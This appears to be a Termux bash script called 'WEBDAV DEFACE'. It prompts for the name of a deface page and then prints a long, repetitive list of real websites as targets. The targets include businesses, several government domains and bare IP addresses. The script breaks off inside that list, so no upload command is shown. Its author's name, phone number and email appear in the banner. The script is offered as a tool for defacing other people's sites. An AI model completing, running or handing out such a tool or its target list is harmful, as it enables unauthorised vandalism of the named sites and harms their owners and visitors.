#!/bin/bash

#CodedBy Venom Reyy
#WEBDAVdeface
#JanganDiRecodeYaGayn:)
#let'go cekidot :)

clear
bi='\033[34;1m' #biru
i='\033[32;1m' #ijo
pur='\033[35;1m' #purple
cy='\033[36;1m' #cyan
me='\033[31;1m' #merah
pu='\033[37;1m' #putih
ku='\033[33;1m' #kuning

clear
cd /sdcard
figlet -f pagga WEBDAV DEFACE | lolcat
      
      echo""
      echo $bi"  _____________________"
      echo $bi" /                    /"$bi"|" $me" contacts: 08810371114669"
      echo $bi"/____________________/"$bi" |" $pu" ========================"
      echo $bi"|" $ku"â€¢Author: Venom Reyyâ€¢" $bi"|" $bi"|" $me" Me:venomreyy@gmail.com"
      echo $bi"|====================|"$bi" |" $pu" ========================"
      echo $bi"|" $ku"Thanks To Termux_ID"$bi"|"$bi" |" $me" FB: Redi Awan "
      echo $bi"|________|Â°|Â°|_______|"$bi"/" $pu"  ========================"
      echo ""
      echo $me"              ["$ku"-"$me"]"$cy"WEBDAV DEFACE"$me"["$ku"-"$me"]"
echo ""
echo $ku "*note:"
echo $me"|========================================|"
echo $me"|"$i"Script Deface Harus Di letakan di Sdcard"$me"|"
echo $me"|"$i"Dan Jangan Di Masukan Ke Folder Apapun"  $me "|"
echo $me"|========================================|"
echo ""
echo -n $ku"Nama Script Deface?:" 
read sc
echo ""
###################################################
# CTRL + C
###################################################
trap ctrl_c INT
ctrl_c() {
clear
echo $"CTRL+C DetectedðŸ˜¢, Trying To Exit" | lolcat
echo ""
echo $" Byee,see you Saiang ðŸ˜—" | lolcat
sleep 1 
exit
}

lagi=1
while [ $lagi -lt 6 ];
do
echo $me"["$ku"1"$me"]" $pu"Belum Punya Target";
echo $me"[============"$pu"=============]"
echo $me"["$ku"2"$me"]" $pu"Sudah Punya Target";
echo ""
echo    "â•­â”€JAWAB TOD:" |lolcat
read -p "â•°â”€#" pil;

case $pil in
1)echo ""
echo $pu"List Target:"
echo $pu"==========================="
echo $me"
http://contsol.co.za
http://colourfactory.co.za
http://scnc.co.za
http://windmillsandporcupines.co.za
http://cblandscapes.co.z
http://naturaleyeimages.com
http://bitsandpieces.co.za
http://infussion.co.za
http://thepremiummakers.com
http://mocosi.co.za
http://itsengineering.co.za
http://handj.co.za
http://ayk.co.za
http://holotropicbreathwork.co.za
http://foodconsult.co.za
http://daretogowildafrica.co.za
http://hybriddevelopments.co.za
http://khumbulalodge.co.za/
http://jewishleaders.co.za/
http://jbkdesigns.co.za/
http://ivplay.co.za/
http://itecbiz.co.za/
http://ispor.co.za/
http://enetics.co.za/
http://electrogem.co.za/
http://dupe.co.za/
http://builtonlogic.co.za/
http://cebz.co.za/
http://cgdesign.co.za/
http://sorgatz.ch/
http://setrabh.org.br/
http://shls001.com/
http://lekamarak.com/
http://begg.co.za/
http://yarn-tex.co.za/
http://amatrust.co.za/
http://equitonh.co.za/
http://e-core.co.za/
http://the-warehouse.co.za/
http://ribcor.co.za/
http://www.laboratoriolamberti.it/
http://www.apollonsrl.it/
http://83.211.190.83/
http://hr.systematixshares.com/
http://179.191.106.82/
http://mail2.eugenio.com.br/
http://adtime.eugenio.com.br/
http://mail3.eugenio.com.br/
http://203.123.34.102/
http://myownemailer.com/
http://wop.zayhi.com/
http://smsget.zayhi.com/
http://praso.wlannet.net/
http://gma2t.wlannet.net/
http://loupatty-mmsd.nl/
http://220.133.3.147/
http://sigmatec.com.tw/
http://560560.ru/
http://troop-1539.org/
http://aerosurf.com/
http://troop-1539.org/
http://office.ratiss.org/
http://www.50-50-50.ru/
http://www.560560.ru/
http://ratiss.org/
http://aerosurf.com/
http://tirupurjobs.net/
http://v.tourmount.com/
http://www.diascope.it/
http://hr.systematixshares.com/
http://latingrid.cl/
http://finance.cedare.int/
http://troop-1539.org/
http://weboriginate.com/
http://jvclogistics.com.au/
http://weboriginate.com/
http://www.chezbelle.com.au/
http://www.ecogenesis.com.au/
http://www.naturesuperfoods.co.nz/
http://www.parkwaymotel.com.au/
http://office.ratiss.org/
http://50-50-50.ru/
http://560560.ru/
http://office.ratiss.org/
http://novacable.pt/
http://dryas.pt/
http://imobiliaria.edifer.pt/
http://novacable.pt/
http://serralvarez.com/
http://www.3dlab.pt/
http://www.agami.pt/
http://www.clser.pt/
http://www.imobiliaria.edifer.pt/
http://www.inoxpal.pt/
http://www.jcardoso.pt/
http://www.lusorol.pt/
http://www.machado-malcher.pt/
http://www.portus.pt/
http://www.sanigres.pt/
http://www.spinerg.com/
http://bestilling.udir.no/
http://158.36.153.158/
http://tirupurjobs.net/
http://apparelworld.org/
http://bestilling.utdanningsdirektoratet.no/
http://gma2t.wlannet.net/
http://praso.wlannet.net/
http://wop.zayhi.com/
http://smsget.zayhi.com/
http://khumbulalodge.co.za/
http://ivplay.co.za/
http://itecbiz.co.za/
http://ispor.co.za/
http://enetics.co.za/
http://electrogem.co.za/
http://dupe.co.za/
http://builtonlogic.co.za/
http://cebz.co.za/
http://cgdesign.co.za/
http://sorgatz.ch/
http://setrabh.org.br/
http://shls001.com/
http://lekamarak.com/
http://0022099.com/
http://yarn-tex.co.za/
http://amatrust.co.za/
http://equitonh.co.za/
http://e-core.co.za/
http://the-warehouse.co.za/
http://ribcor.co.za/
http://www.laboratoriolamberti.it/
http://www.apollonsrl.it/
http://83.211.190.83/
http://hr.systematixshares.com/
http://203.123.34.102/
http://myownemailer.com/
http://wop.zayhi.com/
http://smsget.zayhi.com/
http://praso.wlannet.net/
http://gma2t.wlannet.net/
http://loupatty-mmsd.nl/
http://220.133.3.147/
http://sigmatec.com.tw/
http://560560.ru/
http://troop-1539.org/
http://aerosurf.com/
http://troop-1539.org/
http://office.ratiss.org/
http://www.50-50-50.ru/
http://www.560560.ru/
http://ratiss.org/
http://aerosurf.com/
http://v.tourmount.com/
http://www.diascope.it/
http://hr.systematixshares.com/
http://srv-ine-virtual.sistine.gob.ve/
http://latingrid.cl/
http://happy.mikikk.co.jp/
http://finance.cedare.int/
http://troop-1539.org/
http://weboriginate.com/
http://juiceworld.net.au/
http://weboriginate.com/
http://www.chezbelle.com.au/
http://www.ecogenesis.com.au/
http://www.naturesuperfoods.co.nz/
http://www.parkwaymotel.com.au/
http://office.ratiss.org/
http://50-50-50.ru/
http://560560.ru/
http://office.ratiss.org/
http://serralvarez.com/
http://www.3dlab.pt/
http://www.agami.pt/
http://www.clser.pt/
http://www.inoxpal.pt/
http://www.lusorol.pt/
http://www.machado-malcher.pt/
http://www.portus.pt/
http://www.spinerg.com/
http://bestilling.udir.no/
http://158.36.153.158/
http://bestilling.utdanningsdirektoratet.no/
http://gma2t.wlannet.net/
http://praso.wlannet.net/
http://wop.zayhi.com/
http://smsget.zayhi.com/
http://www.apollonsrl.it
http://bitsandpieces.co.za
http://windmillsandporcupines.co.za
http://scnc.co.za
http://contsol.co.za
http://colourfactory.co.za
http://ayk.co.za
http://daretogowildafrica.co.za
http://floralandfresh.co.za
http://foodconsult.co.za
http://itsengineering.co.za
http://hybriddevelopments.co.za
http://hololiopicbreathwork.co.za
http://hanover-cs.co.za
http://handj.co.za
http://lwrm.co.za
http://lpenterprises.co.za
http://kwalitycommodities.co.za
http://mestern.co.za
http://megro.co.za
http://butterflowers.co.za
http://esfml.com
http://mc3qs.com
http://marjoriebresler.com
http://naturaleyeimages.com
http://my-resume.biz
http://mpark.co.za
http://monliestin.com
http://africa-one.co.za
http://ads247.co.za
http://accelerate-kids.co.za
http://8x8.co.za
http://aaglcapetown2013.org.za
http://allpaint.co.za
http://andrewswebcorner.co.za
http://applebyguesthouse.com
http://atlanticphysio.co.za
http://page31.co.za
http://vaigaidigitals.com
http://systemshouse.co.za
http://www.studentsonline.co.za
http://lucaniphysio.co.za
http://www.onboardpublications.co.za
http://www.oilandclay.co.za
http://www.aquafitness.za.net
http://www.helderbergit.co.za
http://www.pipelinetape.co.za
http://www.drcrsaexpress.co.za
http://officeelf.co.za
http://lioop-1539.org
http://happy.mikikk.co.jp
http://happy.mikikk.co.jp
http://www.alfunctiondesigns.co.za
http://mix007.co.za
http://spyroom.co.za
http://sportspod.co.za
http://southernafricablog.com
http://stand66.com
http://tapifare.com
http://tankertech.co.za
http://tcnig.co.za
http://tcmgroup.co.za
http://liessor.co.za
http://liafficam.co.za
http://tuthukani.co.za
http://nyarhi.co.za
http://digishop.co.za
http://elinemsa.co.za
http://disucctv.co.za
http://www.cai.co.za
http://tirupurjobs.net
http://inlislitev3.perpusnas.go.id
http://clcooling.co.za
http://sublimeconfectionery.co.za
http://gogreenplumbing.co.za
http://golfbuzz.co.za
http://grupo-cma.com
http://inkspot.co.za
http://kgarebana.co.za
http://itliader.co.za
http://itliader.co.za
http://hellomobile.mobi
http://homebuzz.co.za
http://gordonhoward.co.za
http://democonsliuction.co.za
http://chasingfantasia.co.za
http://litehouse.co.za
http://ldata.co.za
http://lunique.co.za
http://chillibitez.co.za
http://cmweb.co.za
http://essentialtours.com
http://entitledvip.com
http://frankadesign.com
http://forget-me-not.co.za
http://findpersonnel.co.za
http://everythingdating.co.za
http://gofigureliaining.co.za
http://mistyorchards.co.za
http://i2iconsulting.co.za
http://hulsmandoors.co.za
http://n8tive.co.za
http://mullets.co.za
http://lunique.co.za
http://marcuskneen.co.za
http://maggis.co.za
http://mambabiz.com
http://loveless.co.za
http://legal-loans.co.za
http://lefort.co.za
http://lavoro.co.za
http://kohl.co.za
http://kobralocks.com
http://karma-it.co.za
http://kalinga.co.za
http://ihx.co.za
http://homes2view.co.za
http://careandcure.cc
http://officezone.co.za
http://nhisa.co.za
http://sinudeity.co.za
http://bitpc.co.za
http://inkspot.co.za
http://agssela.co.za
http://grassroute.co.za
http://stseng.co.za
http://sabookings.co.za
http://nhsgilde.co.za
http://agridex.net
http://stitchaccounting.co.za
http://cavalier.za.net
http://ftkliust.co.za
http://eveni.co.za
http://lilabs.co.za
http://tussenduine.co.za
http://ujwcape.co.za
http://gmet.co.za
http://gearboxpros.co.za
http://sorgatz.ch
http://shls001.com
http://lioop-1539.org
http://tirupurjobs.net
http://www.diascope.it
http://shls001.com
http://happy.mikikk.co.jp
http://branch.prospec.co.th
http://apparelworld.org
http://beeit.co.za
http://lioon.co.za
http://liafficam.co.za
http://foodconsult.co.za
http://crimsonmonkeyweb.com
http://hanover-cs.co.za
http://tapifare.com
http://chillibitez.co.za
http://bee-it.co.za
http://butterflowers.co.za
http://bananabox.co.za
http://ayk.co.za
http://ads247.co.za
http://allpaint.co.za
http://atlanticphysio.co.za
http://valdicare.co.za
http://vmicl.co.za
http://lioon.co.za
http://nyarhi.co.za
http://niliobikes.co.za
http://nhisa.co.za
http://netcallcollect.co.za
http://naturaleyeimages.com
http://mpark.co.za
http://contsol.co.za
http://colourfactory.co.za
http://chillibitez.co.za
http://chasingfantasia.com
http://cenlialtech.co.za
http://moneyin1week.co.za
http://mix007.co.za
http://mediacube.co.za
http://megro.co.za
http://menogold.co.za
http://mestern.co.za
http://tcmgroup.co.za
http://sublimeconfectionery.co.za
http://tieronecapital.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://liessor.co.za
http://bipolar.co.za
http://my-landy.co.za
http://to-do.co.za
http://h-c.name
http://mojapelo.co.za
http://portviewhouse.co.za
http://whadiz.com
http://braziliansandalco.co.za
http://xposurephotography.co.za
http://aquafitness.za.net
http://techdirect.co.za
http://tcnig.co.za
http://tankertech.co.za
http://tcmgroup.co.za
http://systemshouse.co.za
http://sublimeconfectionery.co.za
http://tieronecapital.co.za
http://thepremiummakers.com
http://thembelahome.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://liessor.co.za
http://ziady.com
http://paradiseyouthclub.com
http://kabby.tk
http://dryfaden.com
http://beydagida.com
http://ariquemesagencia.com.br
http://quintessential-tours.com
http://prorepafrica.com
http://rollaslat.com
http://orbfusion.com
http://jormid.net
http://savanacloud.com
http://opiniong.com
http://orbfusion.com
http://studentsonline.co.za
http://safemode.co.za
http://cederberghouse.co.za
http://rollaslat.com
http://roofliuss.co.za
http://savanacloud.com
http://southernafricablog.com
http://stand66.com
http://tapifare.com
http://techdirect.co.za
http://thepremiummakers.com
http://thepremiummakers.com
http://liafficam.co.za
http://whadiz.com
http://whosting.co.za
http://whosting.co.za
http://savanacloud.com
http://opiniong.com
http://thepremiummakers.com
http://quintessential-tours.com
http://prorepafrica.com
http://rollaslat.com
http://orbfusion.com
http://jormid.net
http://savanacloud.com
http://orbfusion.com
http://studentsonline.co.za
http://safemode.co.za
http://cederberghouse.co.za
http://rollaslat.com
http://roofliuss.co.za
http://savanacloud.com
http://southernafricablog.com
http://stand66.com
http://bee-it.co.za
http://butterflowers.co.za
http://bananabox.co.za
http://ayk.co.za
http://ads247.co.za
http://allpaint.co.za
http://atlanticphysio.co.za
http://valdicare.co.za
http://vmicl.co.za
http://lioon.co.za
http://nyarhi.co.za
http://niliobikes.co.za
http://nhisa.co.za
http://netcallcollect.co.za
http://naturaleyeimages.com
http://mpark.co.za
http://contsol.co.za
http://colourfactory.co.za
http://chillibitez.co.za
http://chasingfantasia.com
http://cenlialtech.co.za
http://moneyin1week.co.za
http://mix007.co.za
http://mediacube.co.za
http://megro.co.za
http://menogold.co.za
http://mestern.co.za
http://tcmgroup.co.za
http://sublimeconfectionery.co.za
http://tieronecapital.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://liessor.co.za
http://www.ajaxfilebrowser.co 
http://bitsandpieces.co.za 
http://windmillsandporcupines.co.za 
http://scnc.co.za 
http://contsol.co.za
 http://colourfactory.co.za 
http://ayk.co.za
 http://daretogowildafrica.co.za 
http://floralandfresh.co.za 
http://foodconsult.co.za 
http://itsengineering.co.za 
http://holotropicbreathwork.co.za 
http://handj.co.za 
http://lpenterprises.co.za 
http://kwalitycommodities.co.za 
http://mestern.co.za 
http://mc3qs.com 
http://naturaleyeimages.com 
http://my-resume.biz 
http://mpark.co.za 
http://montdestin.com 
http://africa-one.co.za 
http://8x8.co.za 
http://allpaint.co.za 
http://applebyguesthouse.com 
http://atlanticphysio.co.za 
http://systemshouse.co.za 
http://www.studentsonline.co.za 
http://lucaniphysio.co.za 
http://www.pipelinetape.co.za 
http://www.drcrsaexpress.co.za 
http://mix007.co.za/
http://stand66.com 
http://tapifare.com 
http://tcmgroup.co.za 
http://tressor.co.za 
http://trafficam.co.za 
http://nyarhi.co.za 
http://inlislitev3.perpusnas.go.id 
http://clcooling.co.za 
http://sublimeconfectionery.co.za 
http://gogreenplumbing.co.za 
http://golfbuzz.co.za 
http://grupo-cma.com 
http://kgarebana.co.za 
http://ittrader.co.za 
http://hellomobile.mobi 
http://gordonhoward.co.za 
http://chillibitez.co.za 
http://cmweb.co.za 
http://essentialtours.com 
http://entitledvip.com 
http://forget-me-not.co.za 
http://everythingdating.co.za
http://adr.soluzionimediacom.com/
http://asianapoli.soluzionimediacom.com/
http://call-center.gruppomediacom.it/
http://callcenter.gruppomediacom.it/
http://gancia.soluzionimediacom.com/
http://gruppomediacom.com/
http://gruppomediacom.it/
http://hr.soluzionimediacom.com/
http://job.gruppomediacom.it/
http://www.correiodoc.correiodecarajas.com.br/
http://www.correiodecarajas.com.br/
http://www.enoticialagodetucurui.com/
http://hauntedreview.com/
http://gruppomediacom.com/
http://www.ingacarrasco.com.ar/
http://­api-couplings.co.za/
http://atctaekwondo.co.za/
http://doacoes.fussesp.sp.gov.br/
http://www.6y555.com/
http://www.nuclear-experts.net/
http://www.anecra.pt/
http://209.60.104.53/
http://baza.ds.org.rs/
http://oulitnet.co.za/
http://liteoptec.co.za/
http://0739.gwytk.com/
http://hr.systematixshares.com/
http://leader.gwytk.com/
http://www.rabachino.com/
http://b2b.modelberg.it/
http://hengyue-media.com/
http://webphone.zayhi.com/
http://koiis.co.kr/
http://223.255.137.119/
http://sys.betafac.com/
http://gateway.net.co/
http://hq.prospec.co.th/
http://branch.prospec.co.th/
http://rso.gie-vso.fr/
http://112acil.com/
http://magazam.net/
http://happy.mikikk.co.jp/
http://ns1.112acil.com/
http://shop.magazam.net/
http://www.atakan.com.tr/
http://www.magazam.net/
http://ns1.atakan.com.tr/
http://ns1.magazam.net/
http://ns1.vfbayi.com/
http://ns1.evdeiste.com/
http://ptdel.com/
http://majmudars.com/
http://fmetiquetas.com/
http://lacre.pt/
http://www.anecra.pt/
http://saharamutual.com/
http://myownemailer.com/
http://sphinxillustrations.com/
http://www.sphinxanimations.com/
http://vzcx.idasoft.es/
http://213.96.91.26/
http://adr.soluzionimediacom.com/
http://asianapoli.soluzionimediacom.com/
http://call-center.gruppomediacom.it/
-http://callcenter.gruppomediacom.it/
http://gancia.soluzionimediacom.com/
http://gruppomediacom.com/
http://gruppomediacom.it/
http://hr.soluzionimediacom.com/
http://job.gruppomediacom.it/
http://bmis.co.za/
http://capewinedirect.co.za/
http://consciouscapital.co.za/
http://­dry-break.co.za
http://elt.co.za
http://expressiv.co.za
http://­fabiandemo.co.za
http://­fall-arrest.co.za/
http://­fall-protection.co.za­/
http://­flip-flap.co.za/
http://­folding-stairs.co.za/
http://­gangways.co.za/
http://­girlsworld.co.za/
http://­go-mail.co.za/
http://­ibp-jhb.co.za/
http://morling.co.za/
http://mypersonaltrainer.co.­za/
http://fosoft.cn
http://www.lyvtc.cn
http://www.ybklzx.com
http://www.czsdw.com
http://www.kobacn.com
http://www.sxnm.net
http://www.letsch.com
http://d-searcher.com
http://forums.adcom-add.vn
http://www.zx9903.com
http://www.leisuretour.cn
http://www.johsun.com.cn
http://www.xm-cs.com
http://www.sztaichen.com
http://www.lmsqjy.net
http://www.u2u3.cn
http://www.crystalsoftwaregroup.com
http://mail.minge.gov.cn
http://xhgmwsbwg.minge.gov.cn
http://www.xcjjzd.gov.cn
http://www.syjingshenbing.net
http://www.smzmb.net
http://www.qpzyy.com
http://www.szwztc.com
http://www.huanxiuresort.com
http://www.syhxk.com
http://www.panyan8.com
http://www.syjsbyy.net
http://www.syjsk.net
http://www.syyyzyy.net
http://www.syshimian.net
http://www.syshimian.com
http://www.syyyzyy.com
http://www.syzhiliao.net
http://www.syjingshenbing.com
http://www.syqpz.com
http://www.syzhiliao.com
http://www.syyiyuzheng.com
http://www.syqpz.net
http://www.syyyz.net
http://www.syyiyuzheng.net
http://www.syjsb.net
http://pubworksbmsi.com
http://aworkorder.com
http://permitsoftware.com
http://www.higoodhotels.com
http://www.fdlighting.com
http://www.jngzx.com.cn
http://www.zmzmp.com
http://www.sunjex.com
http://www.publicworksbmsi.com
http://www.boxincapital.com
http://yfplac.com/sukijan.htm
http://3g.yfplac.com/sukijan.htm
http://lmhxd.com/sukijan.htm
http://mychuanmei.com/sukijan.htm
http://www.xccylt.com/sukijan.htm
http://xnrsoft.com/sukijan.htm
http://www.petrelocation.com.my/sukijan.htm
http://paslanmazbayrakdiregi.com/sumijan.htm
http://afgbilgisayar.com/sumijan.htm
http://asnurotomotiv.com
http://atikplastik.com
http://besirozer.com
http://burkim.com.tr
http://dakkik.com
http://ferma-tr.com
http://ferma-tr.com
http://galeriapollo.com
http://grmimpex.com
http://maliyorum.org
http://merdiven.com
http://merdivenhalisi.com
http://nevzatsoydan.com
http://ozerstair.com
http://ozerstairs.com
http://savocats.com
http://solutionsegitim.com
http://teraelektronik.com
http://www.afgbilgisayar.com
http://www.artem.com.tr
http://www.asnurotomotiv.com
http://www.besirozer.com
http://www.bms-co.com.tr
http://www.dakkik.com
http://www.fulyagm.com
http://www.galeriapollo.com
http://www.kusadasirealestate.com
http://www.malianaliz.net
http://www.malianaliz.org
http://www.maliyorum.com
http://www.merdiven.com
http://www.merdivenhalisi.com
http://www.nennycollection.com
http://www.ozerahsap.com
http://www.ozermerdivenmarket.com
http://www.ozerstair.com
http://www.ozerstairs.com
http://www.portatifmerdiven.com
http://www.savocats.com
http://www.sinor.com.tr
http://www.teraelektronik.com
http://duschk.icc.sa
http://e-ctasia.com
http://news.e-ctasia.com
http://shop.e-ctasia.com
http://blog.e-ctasia.com
http://info.e-ctasia.com
http://admin.e-ctasia.com
http://contact.e-ctasia.com
http://mail.e-ctasia.com
http://forum.e-ctasia.com
http://product.e-ctasia.com
http://236.co.kr
http://admin.236.co.kr
http://login.236.co.kr
http://blog.236.co.kr i
http://news.236.co.kr
http://mail.236.co.kr
http://iblec.com.sa
http://ote-sa.com
http://saudigulf.com
http://­online-training.co.za­/
http://­plandesign.co.za/
http://­precisionplastics.co.­za/
http://­printco.co.za/
http://silveroakgroup.co.za/
http://­southafrica-direct.co­m/
http://­swivel-joints.co.za/
http://­wmmacorp.co.za/
http://hq.prospec.co.th/
http://branch.prospec.co.th/
http://tj.allbest.org/
http://www.rabachino.com/
http://www.bbba-grh.com/
http://gruppomediacom.com/
http://www.ratiss.org/
http://www.560560.ru/
http://www.50-50-50.ru/
http://office.ratiss.org/
http://560560.ru/
http://50-50-50.ru/
http://itsallgoodforyou.com/
http://tirupurjobs.net/
http://apparelworld.org/
http://cht.e-bestis.com.tw/
http://apbw.e-bestis.com.tw/
http://doacoes.fussesp.sp.gov.br/
http://www.6y555.com/
http://www.nuclear-experts.net/
http://www.anecra.pt/
http://209.60.104.53/
http://baza.ds.org.rs/
http://oulitnet.co.za/
http://liteoptec.co.za/
http://0739.gwytk.com/
http://hr.systematixshares.com/
http://leader.gwytk.com/
http://www.rabachino.com/
http://b2b.modelberg.it/
http://hengyue-media.com/
http://webphone.zayhi.com/
http://koiis.co.kr/
http://223.255.137.119/
http://sys.betafac.com/
http://gateway.net.co/
http://hq.prospec.co.th/
http://branch.prospec.co.th/
http://rso.gie-vso.fr/
http://112acil.com/
http://magazam.net/
http://happy.mikikk.co.jp/
http://ns1.112acil.com/
http://shop.magazam.net/
http://www.atakan.com.tr/
http://www.magazam.net/
http://ns1.atakan.com.tr/
http://ns1.magazam.net/
http://ns1.vfbayi.com/
http://ns1.evdeiste.com/
http://ptdel.com/
http://majmudars.com/
http://fmetiquetas.com/
http://lacre.pt/
http://www.anecra.pt/
http://saharamutual.com/
http://myownemailer.com/
http://sphinxillustrations.com/
http://www.sphinxanimations.com/
http://vzcx.idasoft.es/
http://213.96.91.26/
http://adr.soluzionimediacom.com/
http://asianapoli.soluzionimediacom.com/
http://call-center.gruppomediacom.it/
-http://callcenter.gruppomediacom.it/
http://gancia.soluzionimediacom.com/
http://gruppomediacom.com/
http://gruppomediacom.it/
http://hr.soluzionimediacom.com/
http://job.gruppomediacom.it/
http://www.correiodoc.correiodecarajas.com.br/
http://www.correiodecarajas.com.br/
http://www.enoticialagodetucurui.com/
http://hauntedreview.com/
http://branch.prospec.co.th/
http://gx.xiongsu.cn/
http://hq.prospec.co.th/
http://wop.zayhi.com/
http://www.tciil.co.in/
http://www.ldgb.net/
http://standards.co.kr/
http://koiis.co.kr/
http://xdoors.astor.it/
http://troop-1539.org/
http://familien-poulsen.dk/
http://orders.southeasternfood.com/
http://leader.gwytk.com/
http://0739.gwytk.com/
http://fmetiquetas.com/
http://oulitnet.co.za/
http://epssa.co.za/
http://loushifashion.com/
http://powerm.cn/
http://60.18.129.36/
http://cszhitu.com/
http://fxlnhly.com/
http://info.yeyadu.cn/
http://electronicculture.ru/
http://lnhuaxun.com/
http://web.yeyadu.cn/
http://www.yeyadu.cn/
http://westmillusa.com/
http://adtime.eugenio.com.br/
http://adtrafficweb.eugenio.com.br/
http://adtrafficweb.grupoeugenio.com.br/
http://offertelavoro.gruppomediacom.it/
http://recupero-crediti.gruppomediacom.it/
http://recuperocrediti.gruppomediacom.it/
http://ricerchedimercato.gruppomediacom.it/
http://www.calciomercatonapoli.info/
http://www.gruppomediacom.com/
http://www.maestrodascia.eu/
http://www.mediacom.biz/
http://maestrodascia.eu/
http://mediacom.biz/
http://tciglobal.com/
http://0731.zgxxk.net/
http://0745.gwytk.com/
http://bestilling.utdanningsdirektoratet.no/
http://www.ldgb.net/
http://www.zgxxk.net/
http://www.567888.pw/
http://www.danahias.at/
http://www.wsdscu.org/
http://bestilling.udir.no/
http://scm.icams.co.kr/
http://158.36.153.158/
http://tirupurjobs.net/
http://www.apparelworld.org/
http://www.tirupurjobs.net/
http://apparelworld.org/
http://gma2t.wlannet.net/
http://praso.wlannet.net/
http://smsget.zayhi.com/
http://tctnh.wlannet.net/
http://webphone.zayhi.com/
http://wop.zayhi.com/
http://isu.allbest.org/
http://iept.allbest.org/
http://cucbridals.com/
http://miracletouch.com.tw/
http://myteam4u.com/
http://imode.e-bestis.com.tw/
http://test.allbest.org/
http://211.23.248.40/
http://gx.xiongsu.cn/
http://cheeshin.com.tw/
http://admats.concerts.com/
http://my.smser.eu/
http://www.lawrenceting.com/
http://dike.dpt.go.th/
http://www.elcsfj.gov.cn/
http://documents.co.st-lucie.fl.us/
http://www.ybsds.gov.cn/
http://rsj.xxz.gov.cn/
http://www.xzll.gov.cn/
http://www.xmfg.gov.cn/
http://zzx.wlcbsgs.gov.cn/
http://www.librogondwana.com.ar/
http://www.ingacarrasco.com.ar/
http://www.salsadella.com.ar/
http://www.bgmgroup.cn/
http://ssc.rrp.kr/

http://www.apollonsrl.it
http://bitsandpieces.co.za
http://windmillsandporcupines.co.za
http://scnc.co.za
http://contsol.co.za
http://colourfactory.co.za
http://ayk.co.za
http://daretogowildafrica.co.za
http://floralandfresh.co.za
http://foodconsult.co.za
http://itsengineering.co.za
http://hybriddevelopments.co.za
http://hololiopicbreathwork.co.za
http://hanover-cs.co.za
http://handj.co.za
http://lwrm.co.za
http://lpenterprises.co.za
http://kwalitycommodities.co.za
http://mestern.co.za
http://megro.co.za
http://butterflowers.co.za
http://esfml.com
http://mc3qs.com
http://marjoriebresler.com
http://naturaleyeimages.com
http://my-resume.biz
http://mpark.co.za
http://monliestin.com
http://africa-one.co.za
http://ads247.co.za
http://accelerate-kids.co.za
http://8x8.co.za
http://aaglcapetown2013.org.za
http://allpaint.co.za
http://andrewswebcorner.co.za
http://applebyguesthouse.com
http://atlanticphysio.co.za
http://page31.co.za
http://vaigaidigitals.com
http://systemshouse.co.za
http://www.studentsonline.co.za
http://lucaniphysio.co.za
http://www.onboardpublications.co.za
http://www.oilandclay.co.za
http://www.aquafitness.za.net
http://www.helderbergit.co.za
http://www.pipelinetape.co.za
http://www.drcrsaexpress.co.za
http://officeelf.co.za
http://lioop-1539.org
http://happy.mikikk.co.jp
http://happy.mikikk.co.jp
http://www.alfunctiondesigns.co.za
http://mix007.co.za
http://spyroom.co.za
http://sportspod.co.za
http://southernafricablog.com
http://stand66.com
http://tapifare.com
http://tankertech.co.za
http://tcnig.co.za
http://tcmgroup.co.za
http://liessor.co.za
http://liafficam.co.za
http://tuthukani.co.za
http://nyarhi.co.za
http://digishop.co.za
http://elinemsa.co.za
http://disucctv.co.za
http://www.cai.co.za
http://tirupurjobs.net
http://inlislitev3.perpusnas.go.id
http://clcooling.co.za
http://sublimeconfectionery.co.za
http://gogreenplumbing.co.za
http://golfbuzz.co.za
http://grupo-cma.com
http://inkspot.co.za
http://kgarebana.co.za
http://itliader.co.za
http://itliader.co.za
http://hellomobile.mobi
http://homebuzz.co.za
http://gordonhoward.co.za
http://democonsliuction.co.za
http://chasingfantasia.co.za
http://litehouse.co.za
http://ldata.co.za
http://lunique.co.za
http://chillibitez.co.za
http://cmweb.co.za
http://essentialtours.com
http://entitledvip.com
http://frankadesign.com
http://forget-me-not.co.za
http://findpersonnel.co.za
http://everythingdating.co.za
http://gofigureliaining.co.za
http://mistyorchards.co.za
http://i2iconsulting.co.za
http://hulsmandoors.co.za
http://n8tive.co.za
http://mullets.co.za
http://lunique.co.za
http://marcuskneen.co.za
http://maggis.co.za
http://mambabiz.com
http://loveless.co.za
http://legal-loans.co.za
http://lefort.co.za
http://lavoro.co.za
http://kohl.co.za
http://kobralocks.com
http://karma-it.co.za
http://kalinga.co.za
http://ihx.co.za
http://homes2view.co.za
http://careandcure.cc
http://officezone.co.za
http://nhisa.co.za
http://sinudeity.co.za
http://bitpc.co.za
http://inkspot.co.za
http://agssela.co.za
http://grassroute.co.za
http://stseng.co.za
http://sabookings.co.za
http://nhsgilde.co.za
http://agridex.net
http://stitchaccounting.co.za
http://cavalier.za.net
http://ftkliust.co.za
http://eveni.co.za
http://lilabs.co.za
http://tussenduine.co.za
http://ujwcape.co.za
http://gmet.co.za
http://gearboxpros.co.za
http://sorgatz.ch
http://shls001.com
http://lioop-1539.org
http://tirupurjobs.net
http://www.diascope.it
http://shls001.com
http://happy.mikikk.co.jp
http://branch.prospec.co.th
http://apparelworld.org
http://beeit.co.za
http://lioon.co.za
http://liafficam.co.za
http://foodconsult.co.za
http://crimsonmonkeyweb.com
http://hanover-cs.co.za
http://tapifare.com
http://chillibitez.co.za
http://bee-it.co.za
http://butterflowers.co.za
http://bananabox.co.za
http://ayk.co.za
http://ads247.co.za
http://allpaint.co.za
http://atlanticphysio.co.za
http://valdicare.co.za
http://vmicl.co.za
http://lioon.co.za
http://nyarhi.co.za
http://niliobikes.co.za
http://nhisa.co.za
http://netcallcollect.co.za
http://naturaleyeimages.com
http://mpark.co.za
http://contsol.co.za
http://colourfactory.co.za
http://chillibitez.co.za
http://chasingfantasia.com
http://cenlialtech.co.za
http://moneyin1week.co.za
http://mix007.co.za
http://mediacube.co.za
http://megro.co.za
http://menogold.co.za
http://mestern.co.za
http://tcmgroup.co.za
http://sublimeconfectionery.co.za
http://tieronecapital.co.za
http://thegiftstore.co.za
http://thefoundation.co.za
http://liessor.co.za
http://bipolar.co.za
http://my-landy.co.za
http://to-do.co.za
http://h-c.name
http://mojapelo.co.za
http://portviewhouse.co.za
http://whadiz.com
http://braziliansandalco.co.za
http://xposurephotography.co.za
http://aquafitness.za.net
http://techdirect.co.za
http://tcnig.co.za
http://tankertech.co.za
http://tcmgroup.co.za
http://systemshouse.co.za
http://sublimeconfectionery.co.za
